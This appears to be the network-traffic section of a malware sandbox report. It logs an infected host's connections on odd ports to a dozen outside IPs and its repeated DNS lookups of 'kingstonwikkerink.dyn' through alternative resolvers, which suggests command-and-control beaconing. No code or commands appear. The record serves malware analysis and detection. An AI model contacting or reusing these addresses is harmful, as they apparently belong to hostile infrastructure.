                                          Oct 26, 2024 19:12:55.960247040 CEST364886718192.168.2.23185.82.200.181
                                          Oct 26, 2024 19:12:55.965570927 CEST671836488185.82.200.181192.168.2.23
                                          Oct 26, 2024 19:12:58.642400980 CEST671836488185.82.200.181192.168.2.23
                                          Oct 26, 2024 19:12:58.642724037 CEST364886718192.168.2.23185.82.200.181
                                          Oct 26, 2024 19:12:58.648135900 CEST671836488185.82.200.181192.168.2.23
                                          Oct 26, 2024 19:13:01.400289059 CEST43928443192.168.2.2391.189.91.42
                                          Oct 26, 2024 19:13:08.665370941 CEST420807830192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:13:08.670902014 CEST78304208088.151.195.22192.168.2.23
                                          Oct 26, 2024 19:13:08.670991898 CEST420807830192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:13:08.671036005 CEST420807830192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:13:08.676415920 CEST78304208088.151.195.22192.168.2.23
                                          Oct 26, 2024 19:13:08.676487923 CEST420807830192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:13:08.681988001 CEST78304208088.151.195.22192.168.2.23
                                          Oct 26, 2024 19:13:09.636486053 CEST78304208088.151.195.22192.168.2.23
                                          Oct 26, 2024 19:13:09.636662006 CEST420807830192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:13:09.636709929 CEST420807830192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:13:21.877448082 CEST42836443192.168.2.2391.189.91.43
                                          Oct 26, 2024 19:13:24.663116932 CEST4952013529192.168.2.2391.149.238.18
                                          Oct 26, 2024 19:13:24.668612957 CEST135294952091.149.238.18192.168.2.23
                                          Oct 26, 2024 19:13:24.668772936 CEST4952013529192.168.2.2391.149.238.18
                                          Oct 26, 2024 19:13:24.668773890 CEST4952013529192.168.2.2391.149.238.18
                                          Oct 26, 2024 19:13:24.674588919 CEST135294952091.149.238.18192.168.2.23
                                          Oct 26, 2024 19:13:24.674671888 CEST4952013529192.168.2.2391.149.238.18
                                          Oct 26, 2024 19:13:24.679994106 CEST135294952091.149.238.18192.168.2.23
                                          Oct 26, 2024 19:13:25.508610010 CEST135294952091.149.238.18192.168.2.23
                                          Oct 26, 2024 19:13:25.508675098 CEST135294952091.149.238.18192.168.2.23
                                          Oct 26, 2024 19:13:25.508960962 CEST4952013529192.168.2.2391.149.238.18
                                          Oct 26, 2024 19:13:25.508961916 CEST4952013529192.168.2.2391.149.238.18
                                          Oct 26, 2024 19:13:25.509015083 CEST4952013529192.168.2.2391.149.238.18
                                          Oct 26, 2024 19:13:35.530158043 CEST5518622472192.168.2.2331.13.248.89
                                          Oct 26, 2024 19:13:35.535531044 CEST224725518631.13.248.89192.168.2.23
                                          Oct 26, 2024 19:13:35.535650969 CEST5518622472192.168.2.2331.13.248.89
                                          Oct 26, 2024 19:13:35.535693884 CEST5518622472192.168.2.2331.13.248.89
                                          Oct 26, 2024 19:13:35.541138887 CEST224725518631.13.248.89192.168.2.23
                                          Oct 26, 2024 19:13:35.541229963 CEST5518622472192.168.2.2331.13.248.89
                                          Oct 26, 2024 19:13:35.546772003 CEST224725518631.13.248.89192.168.2.23
                                          Oct 26, 2024 19:13:36.165191889 CEST224725518631.13.248.89192.168.2.23
                                          Oct 26, 2024 19:13:36.165462971 CEST5518622472192.168.2.2331.13.248.89
                                          Oct 26, 2024 19:13:36.171046972 CEST224725518631.13.248.89192.168.2.23
                                          Oct 26, 2024 19:13:41.179286957 CEST607667362192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:41.185118914 CEST73626076681.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:41.185286999 CEST607667362192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:41.185305119 CEST607667362192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:41.190800905 CEST73626076681.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:41.190859079 CEST607667362192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:41.196227074 CEST73626076681.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:42.076397896 CEST73626076681.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:42.076592922 CEST607667362192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:42.076730013 CEST607667362192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:47.114227057 CEST456926999192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:47.119693995 CEST69994569281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:47.119803905 CEST456926999192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:47.119853973 CEST456926999192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:47.125211000 CEST69994569281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:47.125296116 CEST456926999192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:47.130743980 CEST69994569281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:48.022017956 CEST69994569281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:48.022085905 CEST69994569281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:48.022131920 CEST69994569281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:13:48.022183895 CEST456926999192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:48.022183895 CEST456926999192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:48.022183895 CEST456926999192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:48.022278070 CEST456926999192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:13:58.042923927 CEST4228014623192.168.2.23193.233.193.45
                                          Oct 26, 2024 19:13:58.048311949 CEST1462342280193.233.193.45192.168.2.23
                                          Oct 26, 2024 19:13:58.048475981 CEST4228014623192.168.2.23193.233.193.45
                                          Oct 26, 2024 19:13:58.048475981 CEST4228014623192.168.2.23193.233.193.45
                                          Oct 26, 2024 19:13:58.054095030 CEST1462342280193.233.193.45192.168.2.23
                                          Oct 26, 2024 19:13:58.054191113 CEST4228014623192.168.2.23193.233.193.45
                                          Oct 26, 2024 19:13:58.059779882 CEST1462342280193.233.193.45192.168.2.23
                                          Oct 26, 2024 19:13:59.435455084 CEST1462342280193.233.193.45192.168.2.23
                                          Oct 26, 2024 19:13:59.435729027 CEST4228014623192.168.2.23193.233.193.45
                                          Oct 26, 2024 19:13:59.435909033 CEST4228014623192.168.2.23193.233.193.45
                                          Oct 26, 2024 19:14:04.760798931 CEST346727869192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:14:04.766289949 CEST78693467281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:14:04.766370058 CEST346727869192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:14:04.766433954 CEST346727869192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:14:04.771852970 CEST78693467281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:14:04.771924019 CEST346727869192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:14:04.777302027 CEST78693467281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:14:05.690093040 CEST78693467281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:14:05.690259933 CEST78693467281.29.149.178192.168.2.23
                                          Oct 26, 2024 19:14:05.690440893 CEST346727869192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:14:05.690440893 CEST346727869192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:14:05.690521002 CEST346727869192.168.2.2381.29.149.178
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 26, 2024 19:12:00.390312910 CEST3511953192.168.2.2370.34.254.19
                                          Oct 26, 2024 19:12:00.499921083 CEST4064953192.168.2.2370.34.254.19
                                          Oct 26, 2024 19:12:05.396600008 CEST4712353192.168.2.2370.34.254.19
                                          Oct 26, 2024 19:12:05.507791996 CEST3406853192.168.2.2370.34.254.19
                                          Oct 26, 2024 19:12:10.402713060 CEST5875653192.168.2.23139.84.165.176
                                          Oct 26, 2024 19:12:10.513477087 CEST5230953192.168.2.23139.84.165.176
                                          Oct 26, 2024 19:12:15.411674976 CEST3849053192.168.2.2351.158.108.203
                                          Oct 26, 2024 19:12:15.428292990 CEST533849051.158.108.203192.168.2.23
                                          Oct 26, 2024 19:12:15.520190954 CEST3556253192.168.2.2351.158.108.203
                                          Oct 26, 2024 19:12:15.536366940 CEST533556251.158.108.203192.168.2.23
                                          Oct 26, 2024 19:12:21.400528908 CEST3423053192.168.2.23139.84.165.176
                                          Oct 26, 2024 19:12:26.407067060 CEST4512153192.168.2.235.161.109.23
                                          Oct 26, 2024 19:12:31.412925959 CEST3292953192.168.2.23217.160.70.42
                                          Oct 26, 2024 19:12:31.441342115 CEST5332929217.160.70.42192.168.2.23
                                          Oct 26, 2024 19:12:37.279942036 CEST5076753192.168.2.23217.160.70.42
                                          Oct 26, 2024 19:12:37.307766914 CEST5350767217.160.70.42192.168.2.23
                                          Oct 26, 2024 19:12:43.224294901 CEST3718653192.168.2.23152.53.15.127
                                          Oct 26, 2024 19:12:43.273986101 CEST5337186152.53.15.127192.168.2.23
                                          Oct 26, 2024 19:12:49.985749006 CEST3460053192.168.2.23185.181.61.24
                                          Oct 26, 2024 19:12:50.019938946 CEST5334600185.181.61.24192.168.2.23
                                          Oct 26, 2024 19:12:55.919389009 CEST4741253192.168.2.23217.160.70.42
                                          Oct 26, 2024 19:12:55.948388100 CEST5347412217.160.70.42192.168.2.23
                                          Oct 26, 2024 19:13:03.646188021 CEST4554953192.168.2.2364.176.6.48
                                          Oct 26, 2024 19:13:08.653162956 CEST5655353192.168.2.23194.36.144.87
                                          Oct 26, 2024 19:13:08.664350986 CEST5356553194.36.144.87192.168.2.23
                                          Oct 26, 2024 19:13:14.638951063 CEST3671053192.168.2.23139.84.165.176
                                          Oct 26, 2024 19:13:19.644511938 CEST4258453192.168.2.23139.84.165.176
                                          Oct 26, 2024 19:13:24.650511026 CEST4959953192.168.2.23152.53.15.127
                                          Oct 26, 2024 19:13:24.662003994 CEST5349599152.53.15.127192.168.2.23
                                          Oct 26, 2024 19:13:30.511476994 CEST6044353192.168.2.2364.176.6.48
                                          Oct 26, 2024 19:13:35.518095970 CEST4480353192.168.2.23152.53.15.127
                                          Oct 26, 2024 19:13:35.529244900 CEST5344803152.53.15.127192.168.2.23
                                          Oct 26, 2024 19:13:41.167798042 CEST5246853192.168.2.23152.53.15.127
                                          Oct 26, 2024 19:13:41.178767920 CEST5352468152.53.15.127192.168.2.23
                                          Oct 26, 2024 19:13:47.079304934 CEST4314953192.168.2.23185.181.61.24
                                          Oct 26, 2024 19:13:47.113255978 CEST5343149185.181.61.24192.168.2.23
                                          Oct 26, 2024 19:13:53.027122021 CEST4880753192.168.2.235.161.109.23
                                          Oct 26, 2024 19:13:58.030843973 CEST4413253192.168.2.23202.61.197.122
                                          Oct 26, 2024 19:13:58.041903973 CEST5344132202.61.197.122192.168.2.23
                                          Oct 26, 2024 19:14:04.439070940 CEST3530753192.168.2.2380.152.203.134
                                          Oct 26, 2024 19:14:04.759337902 CEST533530780.152.203.134192.168.2.23
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 26, 2024 19:12:00.390312910 CEST192.168.2.2370.34.254.190xfe32Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:05.396600008 CEST192.168.2.2370.34.254.190xc61fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:10.402713060 CEST192.168.2.23139.84.165.1760x9193Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.411674976 CEST192.168.2.2351.158.108.2030xbd4Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:21.400528908 CEST192.168.2.23139.84.165.1760x2c67Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:26.407067060 CEST192.168.2.235.161.109.230xead1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.412925959 CEST192.168.2.23217.160.70.420x63cfStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.279942036 CEST192.168.2.23217.160.70.420x25ccStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.224294901 CEST192.168.2.23152.53.15.1270x8290Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:49.985749006 CEST192.168.2.23185.181.61.240xbb96Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.919389009 CEST192.168.2.23217.160.70.420x9df7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:03.646188021 CEST192.168.2.2364.176.6.480x4b50Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.653162956 CEST192.168.2.23194.36.144.870xb244Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:14.638951063 CEST192.168.2.23139.84.165.1760xc0f4Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:19.644511938 CEST192.168.2.23139.84.165.1760xb0d2Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.650511026 CEST192.168.2.23152.53.15.1270x54faStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:30.511476994 CEST192.168.2.2364.176.6.480x1d4aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:35.518095970 CEST192.168.2.23152.53.15.1270x51bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:41.167798042 CEST192.168.2.23152.53.15.1270x1adbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:47.079304934 CEST192.168.2.23185.181.61.240xf866Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:53.027122021 CEST192.168.2.235.161.109.230xa25cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:58.030843973 CEST192.168.2.23202.61.197.1220x6acStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:14:04.439070940 CEST192.168.2.2380.152.203.1340x92a9Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:15.428292990 CEST51.158.108.203192.168.2.230xbd4No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:31.441342115 CEST217.160.70.42192.168.2.230x63cfNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:37.307766914 CEST217.160.70.42192.168.2.230x25ccNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:43.273986101 CEST152.53.15.127192.168.2.230x8290No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:50.019938946 CEST185.181.61.24192.168.2.230xbb96No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:12:55.948388100 CEST217.160.70.42192.168.2.230x9df7No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:08.664350986 CEST194.36.144.87192.168.2.230xb244No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                          Oct 26, 2024 19:13:24.662003994 CEST152.53.15.127192.168.2.230x54faNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
